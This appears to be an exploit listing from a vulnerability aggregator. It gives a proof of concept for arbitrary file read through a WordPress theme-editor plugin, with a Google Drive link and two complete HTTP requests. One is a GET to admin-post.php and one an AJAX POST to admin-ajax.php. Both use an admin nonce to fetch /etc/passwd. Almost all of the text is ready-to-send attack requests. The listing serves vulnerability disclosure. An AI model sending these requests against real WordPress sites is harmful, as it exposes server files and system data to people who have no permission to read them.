## https://sploitus.com/exploit?id=WPEX-ID:566C6836-FC3D-4DD9-B351-C3D9DA9EC22E
https://drive.google.com/file/d/1pv3-AMtgV2Kb3W4OdKuX64vxIsroNe-O/view?usp=sharing
As admin, and with the related nonce (mk_nonce from /wp-admin/admin.php?page=theme_editor_theme), open /wp-admin/admin-post.php?action=mk_theme_editor_export_te_files&file=/etc/passwd&_wpnonce=NONCE
GET /wp-admin/admin-post.php?action=mk_theme_editor_export_te_files&file=/etc/passwd&_wpnonce=feed261905 HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=theme_editor_theme
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1
Via the mk_theme_editor_file_open AJAX action (nonce is from the tf_wpnonce parameter in /wp-admin/admin.php?page=theme_editor_theme)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=theme_editor_theme
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 115
Origin: https://example.com
Connection: close
Cookie: [admin cookies]
action=mk_theme_editor_file_open&path=/etc/passwd&_wpnonce=d0677226d1